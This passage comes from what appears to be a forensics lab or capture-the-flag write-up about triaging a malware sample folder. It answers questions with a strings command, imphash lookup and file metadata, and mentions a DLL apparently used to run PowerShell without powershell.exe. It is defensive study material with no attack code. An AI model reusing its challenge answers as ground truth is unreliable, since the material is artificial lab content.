strings.exe -d C:\Labs\Evidence\Airbuzzed\TriageImages\MalwareSample\MalwareSample\Malware\lock | findstr http
Q2: The malware folder contains multiple executables and a single .jpg file. This file does not appear to be a real image. What is the imphash of cat.jpg?
I was not 100% aware of what imphash was, but it turns out that instead of hashing the whole file you hash the import table of an executable (the lowercased DLL and function names, in import order). I couldn't find a tool that could do it in the Tools directory, so I looked for OSINT on the file hash, which led me to VirusTotal, where the imphash is listed. Offline, pefile's PE.get_imphash() computes the same value.
Q3: One of the tools used by the TA is an executable called extract.exe. While we don’t know yet the usage of this program, can you provide the “File Description” of this binary based on its metadata?
Pretty easy as it was in the meta data.
Q4: What is the original file name of 354465_SB_SMBUS_SDK.dll?
Again metadata. It seems to be a way of running PowerShell using only a DLL and not powershell.exe.